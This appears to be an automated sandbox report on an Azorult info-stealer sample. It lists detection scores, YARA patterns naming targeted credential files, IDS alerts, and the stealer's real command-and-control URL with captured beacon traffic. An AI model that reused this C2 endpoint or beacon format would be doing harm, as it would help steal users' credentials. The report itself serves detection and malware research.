Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12E56QE1Fc.exe

Overview

General Information

Sample name:12E56QE1Fc.exe
renamed because original name is a hash value
Original sample name:289c12d43aa35c8c8bf22bace3358cde.exe
Analysis ID:1589148
MD5:289c12d43aa35c8c8bf22bace3358cde
SHA1:1395cfe674d743b8fe568ef373bd91ae7b030adf
SHA256:1254f59c4d71b8cdf0601467e71c8d868f14195b9b27479fa82d19f9eb7dfc0c
Tags:AZORultexeuser-abuse_ch
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Potential time zone aware malware
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 12E56QE1Fc.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\12E56QE1Fc.exe" MD5: 289C12D43AA35C8C8BF22BACE3358CDE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
{"C2 url": "http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x1d61:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
      • 0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
      • 0xcb78:$a2: %APPDATA%\.purple\accounts.xml
      • 0xd2c0:$a3: %TEMP%\curbuf.dat
      • 0x195d4:$a4: PasswordsList.txt
      • 0x145d8:$a5: Software\Valve\Steam
      00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmpAzorult_1Azorult Payloadkevoreilly
      • 0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
      • 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
      Click to see the 8 entries
      SourceRuleDescriptionAuthorStrings
      0.2.12E56QE1Fc.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        0.2.12E56QE1Fc.exe.400000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          0.2.12E56QE1Fc.exe.400000.0.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
          • 0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
          • 0xcb78:$a2: %APPDATA%\.purple\accounts.xml
          • 0xd2c0:$a3: %TEMP%\curbuf.dat
          • 0x195d4:$a4: PasswordsList.txt
          • 0x145d8:$a5: Software\Valve\Steam
          0.2.12E56QE1Fc.exe.400000.0.unpackAzorult_1Azorult Payloadkevoreilly
          • 0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
          • 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
          0.2.12E56QE1Fc.exe.400000.0.unpackAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
          • 0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x19760:$v2: http://ip-api.com/json
          • 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
          Click to see the 15 entries
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-11T12:02:01.040672+010020294671Malware Command and Control Activity Detected192.168.2.54970451.15.142.23580TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-11T12:02:01.040672+010028102761Malware Command and Control Activity Detected192.168.2.54970451.15.142.23580TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 12E56QE1Fc.exeAvira: detected
          Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php"}
          Source: 12E56QE1Fc.exeVirustotal: Detection: 73%Perma Link
          Source: 12E56QE1Fc.exeReversingLabs: Detection: 87%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: 12E56QE1Fc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004094C4 CryptUnprotectData,LocalFree,0_2_004094C4
          Source: 12E56QE1Fc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: Binary string: C:\ralopim\sowofej.pdb source: 12E56QE1Fc.exe
          Source: Binary string: r\runtime\crypt\tmp_776930745\bin\fasofunox.pdb source: 12E56QE1Fc.exe
          Source: Binary string: <C:\ralopim\sowofej.pdbr\runtime\crypt\tmp_776930745\bin\fasofunox.pdbp source: 12E56QE1Fc.exe
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,0_2_0041303C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,0_2_004111C4
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,0_2_0041158C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,0_2_00411590
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,0_2_00412D9C

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.5:49704 -> 51.15.142.235:80
          Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.5:49704 -> 51.15.142.235:80
          Source: Malware configuration extractorURLs: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php
          Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
          Source: global trafficHTTP traffic detected: POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.142.235Content-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 63 ed 47 17 8b 30 65 ec 26 66 9d 26 66 9f 26 67 ea 26 66 9b 45 70 9d 31 70 9d 37 70 9d 31 11 8b 30 6d 8b 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
          Source: global trafficHTTP traffic detected: POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.0Host: 51.15.142.235Connection: closeUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Content-Length: 107Data Raw: 00 00 00 45 14 ef bf bd 30 62 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 46 70 ef bf bd 35 70 ef bf bd 47 70 ef bf bd 3a 70 ef bf bd 37 70 ef bf bd 32 70 ef bf bd 37 70 ef bf bd 3a 70 ef bf bd 33 70 ef bf bd 34 14 ef bf bd 31 11 ef bf bd 30 62 ef bf bd 30 60 ef bf bd 30 63 ef bf bd 30 63 ef bf bd 26 66 ef bf bd 45 17 ef bf bd 31 11 ef bf bd 30 63 ef bf bd 47 17 ef bf bd 30 65 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 26 67 ef bf bd 26 66 ef bf bd 45 70 ef bf bd 31 70 ef bf bd 37 70 ef bf bd 31 11 ef bf bd 30 6d ef bf bd 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: unknownTCP traffic detected without corresponding DNS query: 51.15.142.235
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,0_2_00418688
          Source: unknownHTTP traffic detected: POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.142.235Content-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 63 ed 47 17 8b 30 65 ec 26 66 9d 26 66 9f 26 67 ea 26 66 9b 45 70 9d 31 70 9d 37 70 9d 31 11 8b 30 6d 8b 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 11:02:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:00 GMT; Max-Age=7200Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressLocation: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 11:02:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeSet-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:01 GMT; Max-Age=7200Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressLocation: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/
          Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/
          Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php
          Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php%
          Source: 12E56QE1Fc.exe, 00000000.00000003.2057437868.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.phpA
          Source: 12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json
          Source: 12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://dotbit.me/a/

          System Summary

          barindex
          Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
          Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
          Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
          Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
          Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004352550_2_00435255
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00434AE50_2_00434AE5
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004346500_2_00434650
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0043563D0_2_0043563D
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00434E830_2_00434E83
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: String function: 004289E0 appears 31 times
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: String function: 00404E64 appears 33 times
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: String function: 004062D8 appears 34 times
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: String function: 00403B98 appears 44 times
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: String function: 00404E3C appears 87 times
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: String function: 004034E4 appears 36 times
          Source: 12E56QE1Fc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@0/1
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040A4A4 CoCreateInstance,0_2_0040A4A4
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-7566F0FB-6CDB0B31-5F242D87
          Source: 12E56QE1Fc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 12E56QE1Fc.exeVirustotal: Detection: 73%
          Source: 12E56QE1Fc.exeReversingLabs: Detection: 87%
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: msvcr100.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: crtdll.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSection loaded: rasadhlp.dllJump to behavior
